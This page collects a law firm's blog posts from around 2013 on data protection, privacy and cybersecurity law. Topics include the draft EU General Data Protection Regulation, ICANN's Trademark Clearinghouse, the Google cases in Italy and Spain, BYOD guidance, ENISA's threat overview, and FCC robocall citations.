• Comments
• Trackbacks
• Share Link

This post was written by Gregory S. Shatan, Brad R. Newberg and Judith L. Harris.

The Internet Corporation for Assigned Names and Numbers (ICANN) continues its efforts to globally expand the number of new gTLDs (the part of an Internet address to the right of the dot, such as .com). As the plans for expansion have been developing over the past few years, various groups have raised concerns regarding potential issues, including trademark infringement, cybersquatting and cybercrime. Reluctantly, ICANN developed a very limited set of additional “rights protection mechanisms” (RPMs) that apply solely to the new gTLDs. On March 26, ICANN launched the Trademark Clearinghouse (TMCH). Brandowners will need to register their marks in the TMCH in order to participate in two of these RPMs – Sunrise registration periods and Trademark Claims notices. Now, brandowners will need to decide which marks, if any, they will register in the TMCH, based on their desire to participate in Sunrises and the Trademark Claims system. With significant costs, questionable rewards and unknown risks, the decision will not be an easy one.

For a more detailed analysis, click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The Article 29 Working Party (“Art. 29 WP”), which has already released two opinions (WP191 and WP199) regarding the draft General Data Protection Regulation (“Regulation”), issued a statement and two accompanying annexes addressing some of the most heavily debated elements. This statement addresses relaxation of rules for the public sector, a one-stop-shop for data controllers, the pseudonymisation of data, the standard of consent, cross-border transfers, a risk-based approach, and the household exemption. Many of the views expressed by the Working Party appear to be in direct opposition to a number of observations made by other organisations, such as ITRE (see also our blog and client alert regarding the ITRE’s opinion.

The Art. 29 WP vehemently opposes the concept that the public sector should have a different regulatory regime for data protection from that of the private sector, on the basis that data protection is a fundamental right that is not affected by the status of the data controller being a public body.

The Art. 29 WP seeks the inclusion of pseudonymised and encrypted data with the scope of ‘personal data’ on the basis that they are security techniques that do not change the inherently personal nature of the data.

The Art. 29 WP discourages removing the requirement for explicit consent because it is both essential to ensure that consent is not misused by data controllers, and goes to the heart of proving the validity of consent. It also expressed support for consent being invalid when obtained where there is a significant imbalance of power.

Permitting cross-border data transfers without the need for a binding mechanism was rejected by the Art. 29 WP. The Art. 29 WP’s statement advocated the introduction of Mutual Legal Assistance Treaties (“MLATs”) to govern disclosures of data not otherwise authorized under EU or EU member states’ national laws, where such disclosures would be based on important grounds of public interest. Without such MLATs, data controllers would continue to be prohibited from transferring data outside EU even when subject to the court order of a third country.

The Art. 29 WP supports a risk-based and scalable approach to data protection, with risk depending not only on the size of the controller, but also on the nature and categories of the data being processed.

In relation to the household exemption, commonly relied upon by organisations that ask members or users to add their contacts, such as social media, the Art. 29 WP recommended removing the exemption when its use would result in gainful interest connected with a commercial activity.

This statement will be weighed by the LIBE Committee as part of determining which of the more than 3,000 suggested amendments to incorporate into the Regulation; but given that the Art. 29 WP is made up of the 27 EU member states’ data protection authorities, the Art. 29 WP statement is likely to be influential.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue and Taisuke Kimoto.

As part of the new Japan Revitalisation Programme, Japanese authorities plan to prepare and publish guidelines on anonymisation of personal data. The Cabinet Office of Japan hopes that this will promote the movement of information and property by clarifying the rules related to the use of non-personally identifiable data, and help with the agenda of promoting innovation and R&D.

Japan’s data protection law, the Act of Protection of Personal Information (APPI), prohibits businesses from acquiring ‘personal information’ through unlawful means, but does not bar purchasing or selling personal information as such. At the same time, the law governs how personal data should be handled, including by using the data only for the purposes identified by the controller and notified to individuals. The anticipated guidance should help clarify the type and level of anonymisation required so the data falls outside the APPI.

There is currently no guidance in Japan on how anonymisation should work in practice. The guidance, once issued, should facilitate the use of Big Data for product development and market research.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue and Zack Dong.

On 1 February 2013, China's first set of Personal Data Protection guidelines, the Guidelines for Personal Information Protection in Information Security Technology Public and Commercial Service Systems (the “Guidelines”), came into effect. The Guidelines were issued by the Ministry of Industry and Information Technology (“MIIT”), and apply to all organizations and entities in China except government administrative authorities.

Although not binding, the Guidelines nevertheless clarify key procedures for relevant organisations collecting personal information, and provide an accepted regulatory standard outlining how personal information should be collected, processed, transferred, and deleted.

The Guidelines propose eight principles, namely: (1) a clear purpose for collection, (2) possible minimum amount of data, (3) public notification of the collection, (4) user consent, (5) quality assurance, (6) security assurance, (7) good faith and (8) accountability. The Guidelines define personal information, differentiating between “personal sensitive information” and “personal general information,” similar to provisions in the EU Data Protection Direction 95/46/EC.

Although silent on how it is to be obtained, the Guidelines require consent to be obtained from the data subject before personal information can be collected and processed. For general personal information, implied consent is sufficient, whereas for sensitive personal information, express consent is required. Furthermore, data subjects must be informed of the purpose of collection, means of collection, security protection measures implemented, and scope of use of the personal information prior to the collection.

Under the Guidelines, organisations will be required to delete personal information once the purpose for its collection has been met. Additionally, the collection of sensitive personal information of minors under 16 years of age without their guardian’s consent is prohibited.

The Guidelines prohibit unauthorized transfers of personal information from China to an offshore individual or organization. Cross-border transmission of personal information is permitted only upon express consent by the subject, specific authorisation by national laws and regulations, or approval by relevant and competent authorities.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

Three senior Google executives, given six month suspended jail sentences in Italy in 2010 for data protection breaches relating to the content of a video post by a user in 2006, have been acquitted by an appellate court in Milan.

The Google executives, including Google’s chief privacy officer, were convicted following a trial which related to a video posted on Google Video in 2006 depicting an autistic boy being bullied by classmates. The clip was live for about two months and was only removed by Google following receipt of a complaint. In February 2010, an Italian court found the three executives criminally liable for data protection violations. The judgment stated that as a video hosting provider, Google controlled the processing of the data, and it failed to obtain consent from all parties depicted in the video in violation of the Italian Data Protection Code. The judgment received worldwide criticism since it resulted in an Internet service provider being held responsible for the content posted by its users.

According to a Reuters report, the appellate court held that "the possibility must be ruled out that a service provider, which offers active hosting, can carry out effective, pre-emptive checks of the entire content uploaded by its users."

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue and Katalina Chin.

As Google continues its legal battle with the Spanish Data Protection Authority (DPA), the Spanish High Court (Audiencia Nacional) has referred several questions to the European Court of Justice (ECJ). The questions cover whether individuals have the right to demand the removal and blocking of information contained within Internet search results, even though that information was lawfully collected and accurate at the time of collection. Such search results may have a negative or harmful effect on the individual since the information could potentially be available “over the lifetime of an individual and that of his descendants.”

The case at issue related to a person who, when searching his name, was provided with search results relating to a newspaper advertisement for the auction of his property stemming from an old and subsequently resolved debt. The individual had requested Google to remove the search result, and when it did not do so, complained to the Spanish Data Protection Agency, which upheld the complaint and required Google to amend the search results. As the advertisement had been published in a newspaper, Google felt that the search result should not be taken down, and appealed.

One of the issues referred to the ECJ is whether the Spanish court has jurisdiction over Google, Inc. as a data controller or whether the issue should be tried in a California court, since Google’s local subsidiary only sells advertising to the California parent. The Spanish DPA found jurisdiction on the basis that Google Spain has a sufficient presence in Spain, operates a Spanish top level domain (ccTLD), and processes personal data about Spanish citizens.

A second important question to be answered by the ECJ is whether Google can be classified as a “data controller, rather than only a host. Google argues that it did not produce the information in question, but merely displayed it in search results, and that data would disappear from the search index as soon as it was no longer available from the source web page. Additionally, Google asked the court to consider its rights to the freedom of expression. It argued that forcing it to remove the search results would be detrimental to the public interest, as “there are clear societal reasons” why information about valid legal material which still exists online should be publicly available.

ECJ advocate-general is anticipated to publish an opinion on the matter June 25, and the judges are expected to rule on the matter by the end of the year.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (ICO) published guidance on ‘bring your own device’ (BYOD), given the tremendous increase in employees both connecting to, and seeking to be able to use their personal devices to connect to, their employers’ systems. The ICO reported that 47% of employees now use personal smartphones, laptops or tablets for work, but fewer than three out of 10 are provided with guidance from their employers.

The ICO’s guidance highlights the importance of keeping information secure when using BYOD schemes, and pointed out that data controllers remain responsible for the data, even when processed on employees’ personal devices.

The guidance aims to help organisations develop policies by pointing out the issues that data controllers should consider when adopting BYOD policies, including types of data accessible, locations of data storage, data transfer, the risk of data loss or leakage, the potential for blurring the distinction between personal and business use, and what to do upon the termination of employment. The guidance also addresses security considerations, including in particular, password procedures and encryption, device security capabilities, and dealing with loss or theft of a device, as well as device failure and support.

The ICO has recommended that employees seeking to take advantage of BYOD be issued clear instructions on the separation of data and what types of personal data can and can’t be processed on their personal devices. The ICO also suggested limiting use of the cloud to where necessary, and suggested that it would behove organisations to register devices with a service to allow for remote location, and wiping should a device be lost or stolen.

While the ICO acknowledged that the cost of BYOD controls can be significant, those costs may pale in comparison with the reputational damage caused by serious data breaches, or the loss of an organisation’s proprietary and confidential information.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The proposed new EU General Data Protection Regulation may need to be watered down. The far-reaching proposed draft, which was published in January 2012, aims to unify and strengthen the data protection laws across the 27 EU countries. However, the Financial Times reports that a memo drafted by the Irish presidency admits that “several member states have voiced their disagreement with the level of prescriptiveness of a number of the proposed obligations in the draft regulation.”

There appears to be a prevailing opinion among the member states that the burdens imposed by the draft Regulation must be reduced, especially the most commonly criticised elements, such as the requirement to obtain individuals’ explicit consent and the “right to be forgotten.” Several EU member states, like the UK (see our blog about the UK’s criticism), advocate a “risk-based” approach that would have as its focus whether a substantial threat to a person’s personal data exists. Several EU member states would like small companies spared from many of the compliance burdens contained in the proposed Regulation—an approach advocated by the American Chamber of Commerce.

Some member states, including the UK, would like to see the designation of a data protection officer reduced to an optional requirement. Germany and Belgium argue for the easing of rules related to the use of data by public institutions.

The lobbying for watering down the proposed Regulation has been openly criticised by a coalition of privacy groups, as well as by Jan Philipp Albrecht, the rapporteur for the draft regulation (see also our blog about Albrecht’s report on the proposed Regulation). Given the raging debate, it looks as though enough member states oppose the draft Regulation to block the entire proposal, unless the European Parliament and the European Commission heed the calls for compromise.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (“ICO”) has published an explanation of the process and timeline of the proposed EU data protection reform and its involvement in the on-going negotiations.

According to the ICO, the proposed EU data protection reforms could “be one of the biggest changes to data protection that the (UK) has ever seen.” The changes will impact on all citizens of the UK to a certain degree; especially in relation to consent mechanisms and the controversial “right to be forgotten,” should it be incorporated into the law.

The five European Parliamentary committees – Civil Liberties, Justice and Home Affairs (LIBE); Industry, Research and Energy (ITRE); Legal Affairs (JURI); Employment and Social Affairs (EMPL); and Internal Market and Consumer Protection (IMCO) – are making progress on their amendments to the Proposed General Data Protection Regulation (the “Proposed Regulation”) and the Proposed Directive. Each committee must submit its own amendments prior to negotiating a consolidated version. The Council of the European Union, which consists of ministers from each Member State (including the UK’s Ministry of Justice), must also complete its impending amendments, before they and the European Parliament can approve a final text detailing the new rules.

Ireland is hoping to adopt the new rules by the end of June this year; however, this is widely believed to be an unrealistic target because certain Member States (including the UK) have criticised the proposal for a directly applicable Regulation, which they consider to be overly prescriptive, favouring instead the implementation of a Directive. Further concerns arise from the proposal that the Regulation will be confined to the private sector - the ICO and other EU data protection authorities have argued strongly against this.

The timescales put forward demonstrate the commitment to prioritising and finalising the complex process of creating a framework which strikes the right balance between protecting personal data without overburdening business or stifling economic growth and innovation.

With discussions on the proposals already having taken three years, many have become disillusioned with the duration of the process. 2013 is set to be a crucial year in progressing negotiations, especially as the Commission is attempting to bring the reform into law by 2014, when the European Parliament and the Commission are due for re-appointment.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O’Donoghue.

In a bid to help organisations better understand their compliance obligations under the Payment Card Industry Data Security Standard (PCI DSS) when using cloud technology to collect, store or transmit credit card data, the Payment Card Industry Security Standards Council (PCI SSC) has published the PCI DSS Cloud Computing Guidelines Information Supplement.

Formed through a collaboration of more than 100 global organisations representing banks, merchants, security assessors and technology vendors, the guidelines state that the PCI DSS will still apply “if payment card data is stored, processed or transmitted in a cloud environment”.

According to the PCI SSC, unless the cloud deployment model is truly private (on-site), security is a shared responsibility between the Cloud Service Provider (CSP) and its clients, with the levels of responsibility between the two depending on the type of cloud service model used.

Software as a Service (SaaS) enables clients to use the CSP’s applications through the cloud, resulting in a greater loss of control over security and lower responsibility. Platform as a Service (PaaS) allows clients to deploy their applications onto the CSP’s cloud infrastructure, reducing their control to a lesser extent than SaaS and increasing their responsibilities. Infrastructure as a Service (IaaS) permits clients to use the CSP’s processing, storage and networks to deploy and run operating systems, applications, and other software on a cloud infrastructure, providing the client with a high level of control and responsibility. The level of security responsibility across the cloud service models generally migrates toward the client as the client moves from an SaaS model (least client responsibility) to an IaaS model (most client responsibility).

It is essential that clients understand their requirements so as to determine whether they will be met by a particular CSP. The guidelines recommend that clients undertake risk assessments to enable them to make an informed decision.

Where control is outsourced to the third-party CSP, the council consider it essential for contractual agreements to be in place – and ongoing due diligence to be carried out – to ensure that the CSP is complying with the security levels required by the client and the PCI DSS. They warn that “if the security responsibilities are not properly assigned, communicated and understood, insecure configurations or vulnerabilities could go unnoticed and unaddressed, resulting in potential exploit and data loss.”

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The Business Software Alliance (BSA) Global Cloud Computing Scorecard, released March 7, 2013, indicates that the legal frameworks for cloud computing are improving, but inconsistently and with some worrying trends. The study tracks year-over-year changes in the global cloud policy landscape. It assesses the relevant laws and regulations of 24 countries that together account for 80 percent of the global information and communications technology market, focussing on topics such as data portability, cybercrime, and information technology infrastructure.

This year’s study highlights an increasing number of countries adopting international norms aimed at building user trust while enabling innovation. Singapore was commended for having adopted the best of each of the Asia-Pacific Economic Cooperation and the European Union policies. However, many of the world’s biggest IT markets fell in the ranking, including each of the six EU countries covered by the study. The UK fell from sixth to seventh place, partly because of the requirement for businesses to register their data processing with a regulator, which was seen as an unnecessary burden, and the result of the UK’s failure to implement the Convention on Cybercrime in its entirety.

A number of countries were criticised, including South Korea, Indonesia, and Vietnam, for taking steps to effectively disconnect themselves from cloud computing by drafting legislation that would impose unnecessary formalities on cloud providers or by requiring them to establish national data centres. The BSA expressed concern that “governments are starting to chop up the cloud”, pointing out that if international service providers are blocked out of local markets, the economies of scale and efficiency, which cloud seeks to achieve, will be undermined. Protectionist policies should be shunned in favour of legal and regulatory frameworks that encourage innovation, and that can deliver benefits by ensuring confidence in the cloud through secure infrastructure, strong cybersecurity and respect of international data protection laws.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O’Donoghue.

The use of cloud computing services is growing at an unprecedented rate, and brings with it concerns over the security of personal data stored on cloud servers. A recent study by the European Parliament’s Committee on Civil Liberties, Justice and Home Affairs (“LIBE”) argues that the main issue arising from the growing use of cloud computing is the loss of control over the security of individuals’ personal data. This is because control over personal data security is exercised solely by the cloud storage provider, with individual web users often having no knowledge or understanding of the security measures in place.

The study’s authors emphasise that cloud computing contributes to the growth of cross-border data transfers and poses major challenges to EU policy makers regarding combatting cybercrime and protecting citizens’ privacy. Alarmingly for EU citizens, the study warns that “mass surveillance” of non-U.S. citizens' data stored in the cloud, including through services such as Apple iCloud and Google Drive, is permitted through the controversial Foreign Intelligence Surveillance Act Amendment Act (“FISAAA”), which became law in early January 2013. Any data relating to U.S. foreign policy, stored on popular U.S.-based cloud servers, can be appropriated by U.S. authorities without prior consent, warning or indeed a warrant, as FISAAA "expressly permits purely political surveillance".

Although U.S. authorities will likely only target organisations engaging in activities that are unlawful or potentially against U.S. interests, such as those associated with activists, protestors or political groups, the law represents a significant risk to EU privacy as it still permits U.S. law enforcement agencies power to access any EU data based on U.S. cloud servers. It is vital for EU consumers to consider carefully in which jurisdiction to store their data so as to ensure the greatest level of protection.

The Committee suggests introducing a legal definition of cybercrime and clarifying the legal concepts of "jurisdiction", "data processor" and "data controller" in relation to cloud computing within the EU. This is to allow for better understanding of its scope and permit easier measurement of the costs associated with cyber incidents. The study recommends that all EU citizens be made aware of any exposure of their sensitive data to third-country surveillance. This is because uninformed exposure could have a fundamental impact on individuals’ rights to respect for private and family life, enshrined in the European Charter for Fundamental Rights.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The European Network and Information Security Agency (“ENISA”) has published its first independent overview of how the cyberthreat landscape has evolved over the past few years. The report identifies the most common and dangerous cyberthreats, the methods used by malicious users and potential avoidance measures for web users. ENISA’s findings have ramifications from both an EU and global perspective as the threats revealed have no geographic boundaries.

According to the report, “drive-by exploits” are the greatest and most increasing threat to the internet landscape. Drive-by exploits involve injecting malicious code into a website that automatically infects a user’s computer when he or she visits that website. These can then be used to obtain personal information. The websites themselves may also be unknowingly hosting malicious code. This form of cyberattack is on the rise and is even being formulated for mobile devices.

The second biggest cyberthreat identified by ENISA are Trojans (which contain backdoor capabilities) and Worm malware programs (which can self-replicate and redistribute themselves with devastating effect). Worms and Trojans are used by cybercriminals to pull off sophisticated cyberscams involving theft of user credentials and personal data and by governments for cyberespionage.

Code injection is the third top threat - in recent years an increasing amount of attacks and data breaches have been conducted against web applications using well-known attack techniques such as SQL injection (“SQLi”) and cross-site scripting (“XSS”). These threats, which are popular amongst hacktivist groups, attempt to extract data, steal credentials and take control of the targeted webserver.

Other cyberthreats include exploit kits, botnets, denial-of-service attacks, phishing and spam. ENISA emphasises that it is not just cybercriminals acting as the threat agents but also corporations attempting to gain competitive advantage, disgruntled employees, and terrorists who have expanded their activities into cyberspace.

In an era where social media has flourished, the report highlights the vulnerability of technologies such as cloud computing and big data sets, where the concentration of vast amounts of data in a few logical locations makes an attractive target for threat agents. ENISA suggests that many threats can be contained if sufficient risk management is undertaken and appropriate security measures are implemented.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

HBGary, developer of tools and services for protection from cyberspies and terrorists, conducted a new study discussing the impact of cyberattacks and data breaches on investor attitudes. The study, based on a survey of 405 U.S. investors, looked at investor attention to companies’ cybersecurity and which aspects of historical attack and breaches determined investment decisions.

The study highlights cybersecurity’s growing importance to investors, with more than 70 percent of those surveyed confirming they evaluate companies’ cybersecurity practices. A higher proportion, 78.1 percent of the survey participants, indicated they would be unlikely to consider investing in a company with a history of cyberattacks, and 68.7 percent would be disinclined to invest in a company with a history of data breaches.

The study notes that 66 percent of the investors were concerned with how a company responded to a cyberattack or data breach and only 25 percent were interested in the incident itself. This difference highlights that an organisation that suffers a breach must be seen to take decisive action both to remedy an incident and to ensure an effective response in order to avoid negatively impacting the company’s investment profile.

The study also looked at the type of incidents that were of most concern to an investor, with more than 57 percent viewing breaches of personal data more significant than incidents involving IP theft. Only 28.8 percent of investors expressed the opposite view.

This is a staggering outcome, given that IP and trade secret theft or loss is alleged to cost organisations billions of dollars, but it could be that the long-term impact and liability of the loss of personal data can be difficult to quantify. If the draft EU Data Protection Regulation gets passed by the European Parliament in its current form, cybersecurity breaches resulting in data loss could cost organisations up to 2 percent of their worldwide annual turnover, something that will likely result in an increased focus on cybersecurity due diligence when undertaking any investment decision.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Keri S. Bruce and Lisa B. Kim.

Courts and legislators alike have begun to give a person’s social media presence a new kind of legitimacy. We are seeing an upward trend towards allowing service of process in a lawsuit through communications on social media websites, like Facebook, where there is some reliability that the defendant will receive notice.

To read more on this story, check out the latest post on our sister blog, Legal Bytes.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Katharina A. Weimer and Dr. Thomas Fischl.

The German Federal Labor Court had to decide on a work council’s demand to be provided with a personal computer with a group account for access to the internet (in contrast to personalized internet access for the individual works council members). The district court had denied the request; the higher regional court had reversed the decision. Upon appeal by the employer, the federal court upheld the decision that the employer has to provide a non-identifiable internet access to the works council.

The reason for this request was to guarantee that each works council member should be able to research freely on the internet without the employer being able to monitor or review who researched what, and for how long. According to the Works Constitution Act, an employer must provide the works council with the necessary means to conduct its business, including information and communication tools. Whether a specific device or tool is necessary is in the works council’s discretion – in consideration of its own interests, but also the interests of the employer. In order to comply with this provision, the employer had given the works council a personal computer that contains personal data for fulfilling its tasks, including research on the internet – but with personalized internet access only. The works council is entitled to demand non-identifiable access to the internet, especially in light of the works agreement in place between the parties, according to which the employer has certain monitoring permissions - which the works council views as a risk to fulfilling its tasks without obstacles. One of the arguments brought forward by the employer for insisting on personalized access only was the requirement to provide for appropriate data security measures as prescribed in section 9 of the German Federal Data Protection Act (the “Act”), according to which every data controller/processor has to implement measures for ensuring compliance with the Act. This requires that any automated processing and use of personal data, and the acting person, can be traced and verified.

The Federal Labor Court decided that the works council, being a part of the employer (and data controller with regard to the personal data contained on that computer in question) is itself responsible for complying with the requirements of the Act, including the implementation of appropriate technical and organizational security measures on the computer. The requirement to enable the tracking of any processing and use of personal data on that personal computer does not mean, however, that it must be traceable for the employer. It is sufficient if for instance the works council allocates identifiers to the individual works council members without providing the identifiers to the employer.

The decision strengthens the position of German works councils as it gives them wide discretion regarding the implementation of data security measures, and thereby limiting the employer’s options to maintain control over its IT systems.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Judith L. Harris.

While telemarketers, debt collectors and others wait for the Federal Communications Commission (FCC) to answer technical questions such as “EXACTLY what is an autodialer,” the FCC has just made clear that the agency, at least, knows one when it sees one! In companion orders released on Friday (3/15/13), the FCC issued citations to two robocallers (and their owners, principals and officers) for making millions of automatically dialed calls, and using prerecorded or artificial-voice messages (robocalls), to wireless phone numbers without prior authorization from the call recipients; and for failing to provide certain required identifying information in violation of the Telephone Consumer Protection Act (TCPA).

In its investigation, FCC staff members compared lists of the thousands of phone numbers, to which the scrutinized companies had made autodialed and/or prerecorded message calls, to an industry-standard, commercially available database of wireless numbers (assigned and ported) to establish which numbers called by the companies belonged to mobile phones. Then, just for good measure, the agency called a sampling of the numbers to see if any of the called parties had given prior consent to be contacted on their cellphones.

Anyone making robocalls should be aware that, once any call to a wireless phone is established, under the law, the burden switches to the calling party to establish that it had the prior consent necessary to call that phone using an auto-dialer and/or leaving a prerecorded or artificial-voice message. The importance of keeping good records when advance consent has been obtained (in writing in the case of telemarketing calls) cannot be over-emphasized.

While, at this stage, these two FCC citations only act as a warning, they require each company to certify within fifteen days that it has ceased making robocalls to wireless phones without prior authorization and that the calls it does make include the required identifications. If either entity violates its certification, it may then be found liable not only for the unlawful conduct following the certification, but for the original conduct that led to the citation in the first place.

As the FCC pointed out in the orders, a “subsequent forfeiture action based on just the first three hundred (300) of those violations, calculated at the statutory maximum of $16,000 per violation, would result in a potential forfeiture of four million, eight hundred thousand dollars ($4,800,000) against the Company.” In one of the cases, about 4.7 million violations occurred in just the three months of call records reviewed by the agency staff. You do the math…and this does not even take into consideration the inevitable piggy-back class actions that will be filed regardless of whether the entities ever again violate the TCPA.

If you are a telemarketer, a debt collector or anyone else who uses an autodialer or leaves an automated message regarding your business activities (and this aspect of the law even applies to political calling and charitable solicitations), it is important to evaluate the procedures you have in place to ensure compliance with the TCPA by all of your employees and agents. Don’t forget, you are responsible even if you outsource your calling to third-party vendors.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by John W. Chapas.

Bring Your Own Device (BYOD) is an escalating trend by which employees are using their own portable computing devices, including tablets and smart phones, to access their employer’s system and data. Employers are faced with the challenging question of whether they should permit BYOD or only permit employees to access their system and data through company devices.

There are multiple reasons a company should implement a BYOD policy, but there are also associated risks and costs that must be considered.

For a more detailed analysis, click here.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

Following the lead of the Committee on Civil Liberties, Justice and Home Affairs (LIBE), which already released its draft report (see our prior blog) 20 February, the European Parliament Committee on Industry, Research and Energy (ITRE Committee) published its Draft Opinion on the proposed General Data Protection Regulation. This opinion has been submitted to LIBE, which has the task of consolidating amendments and voting on its own report at the end of April.

In the Draft Opinion, ITRE rapporteur Seán Kelly outlined his substantial support for the proposed Regulation and suggested that the changes should help avoid excessive administrative burdens for enterprises, and introduce a greater degree of flexibility, especially in terms of accountability and the notification requirements to supervisory bodies. The ITRE Committee, however, proposed significant amendments to the Regulation in an attempt to ease restrictions on companies by focusing on corporate governance, the use of impact assessments, and bringing increased clarity to the provisions. It has recommended significant alterations to the most contentious provisions, such as consent mechanisms; the rights of access, portability, and to be forgotten; the 24-hour breach notification requirement; and the sanctions regime.

For a more detailed analysis, click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

Following the publication of its “further thoughts" on the European Commission’s proposed new data protection framework, the ICO has now published an in-depth, article-by-article analysis of the proposed General Data Protection Regulation (the Regulation). The ICO pointed out that this is an important opportunity to get the framework correct, as it is likely to remain in force for many years. The paper reflected the ICO’s general concerns and expressed its opinion about some of the more contested elements of the Regulation.

The ICO reiterated the need for further clarity and expressed concerns about the number of delegated acts of the European Commission in the Regulation on the basis that use of the delegated acts is likely to result in continued uncertainly for businesses and data subjects.

The ICO emphasises that the new data protection framework should promote a truly risk-based approach, instead of focusing on the administrative detail and compliance process rather than outcomes, as it could encourage paper-only compliance. The ICO also voiced strong support for the concept of protection by design, so long as the model was principle-based to accommodate scalability and flexibility.

The ICO welcomed “the high standard of consent”, but raised concerns that some data controllers may be left without a lawful basis for processing, and criticised the unequivocal barring of consent obtained in cases of alleged “significant imbalance", pointing out that consent can be obtained for employer-employee data processing. The ICO continues to advocate for the inclusion of “pseudonymised' data within the definition of the personal data, but floated the idea that individuals’ access rights should not apply.

While the ICO generally supports the new right to be forgotten, the paper acknowledges that it may be impossible in practice, because data in the public domain will often be disseminated without the original data controller’s consent or knowledge, which could result in individuals developing a false belief that data is capable of being erased. Despite acknowledging the concerns regarding the right to portability’s potential impact on property rights and trade secrets, and admitting it is not a “classical" element of data protection law, the ICO welcomed its inclusion highlighting that it empowers consumers.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Mark S. Melodia and Paul Bond.

In Clapper vs. Amnesty International, a group including journalists, human right activists, and labor leaders challenged the 2008 amendments made to the Foreign Intelligence Surveillance Act. The amendments included broadening the surveillance powers of the federal government with respect to communications outside the U.S.

Plaintiffs claimed that their work required open communication with persons around the globe and that they had incurred costs to prevent this government surveillance. A 5-4 decision was issued by the Supreme Court, where the majority (Alito, J.) found that the plaintiffs had no Article III standing to sue.

For a more detailed analysis, please click here to read the issued Client Alert.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Lisa B. Kim, Steven Boranian and Joshua B. Marker.

A proposed amendment to California’s “Shine the Light” law seeks to require companies to disclose more detailed information about their data-sharing practices, while giving consumers the ability to bring class action lawsuits under the legislation.

Presently, Shine the Light requires companies doing business with California residents to make a detailed disclosure, upon the consumer’s request, of how personal information was shared for direct-marketing purposes. For more details on how the current legislation works, click here.

The proposed amendment requires companies to respond to a consumer’s request by providing a copy of all the personal information that they hold about that individual, as well as the names and contact information for all third parties with which the company has shared the information during the previous 12 months. In doing so, it seeks to bring back aspects of the legislation that were included in the original Shine the Light bill, but were omitted prior to its passage in 2005.

Moreover, the proposed amendment also seeks to address failed attempts by the plaintiff’s bar to file lawsuits, including class action lawsuits, under the Shine the Light law by specifically stating that a violation of these obligations would be “deemed to constitute an injury to a customer.” Several class actions brought under Shine the Light have been dismissed based on the plaintiffs’ inability to demonstrate any economic injury. The amendment responds to these rulings and entitles consumers access to specified remedies, including civil penalties.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Brad M. Rostolsky, Nancy E. Bonifant, Salvatore G. Rotella, Jr., Elizabeth Doyle O'Brien, Jennifer Pike and Zachary A. Portin.

After much anticipation, the Office for Civil Rights of the United States Department of Health and Human services published the HITECH Final Rule on January 25, 2013. The final regulation contains substantive and technical modifications and additions to the HIPAA Privacy, Security, Enforcement, and Breach Notification Rules.

For a more detailed analysis, please click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The First-Tier Tribunal General Regulatory Chamber for Information Rights has dismissed the first appeal against a Monetary Penalty Notice issued by the UK Information Commissioner’s Offices (ICO) for a serious violation of the Data Protection Act 1998 (DPA). The ICO had issued the Central London Community Healthcare NHS Trust (the Trust) with a Monetary Penalty Notice of £90,000 for repeatedly faxing sensitive patient data relating to its palliative care unit to an incorrect fax number. The ICO issued the notice for a breach of the 7th Data Protection Principle, which requires the implementation of appropriate technical and organisational security measures.

The Trust appealed the penalty on the basis that the ICO erred in law when it issued the monetary penalty as the Trust had gone through an ICO assessment following the self-reported breach. Under the DPA any organisation that goes through an ICO assessment cannot be issued a penalty notice based on the outcome of the assessment. The ICO had argued that it would be absurd not to issue a monetary penalty notice where there was a serious breach of the DPA merely because an organisation had self-reported. The first tribunal found that the process undergone by the Trust following its report of the breach was not an ”assessment,” rather it was an investigation, notwithstanding that the Trust worked with the ICO to remediate its procedures. In order not to diminish the impact of self-reporting, the tribunal did emphasise in its analysis that the ICO does take into account organisations’ self-reporting when the level of the fine is assessed.

When issuing Monetary Policy Notices, the ICO typically exercises its discretion by discounting any penalty by 20% if the fine is paid within a set time period. Prior to the hearing the Trust had offered to pay £72,000 (the sum applicable under the early payment discount scheme) on the basis that this payment would be without prejudice to the right to appeal, and that the payment would be refunded by the ICO if the appeal succeeded; but the ICO refused. The Trust raised this on appeal, arguing that the ICO should have exercised its discretion differently rather than putting the Trust in the position of either paying the discounted amount and foregoing the appeal, or appealing and forfeiting the discount. The first tribunal refused to treat the discount as having been preserved during the appeal process, since the discount scheme sought to encourage early payment and early resolution, finding that as the Trust chose not to accept the terms, it was “its loss” when the appeal failed.

The tribunal’s ruling illustrates the importance of the procedure undertaken by the ICO when issuing Monetary Penalty Notices, and that the risk of appeal and loss of any incentive to resolve a matter expediently rests with the party deciding to appeal.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

On Monday, 11 February, Greg Clark, Financial Secretary to the UK Treasury, announced in the House of Commons that the Financial Services Authority (“FSA”) will head up a new government benchmarking scheme regarding cybersecurity for the UK financial services sector.

The financial sector is coming under increased scrutiny in recent months with the European Central Bank recommending that banks, credit card companies and other payment service providers be required to put in place multiple layers of security to make it harder for hackers to infiltrate internet payment systems.

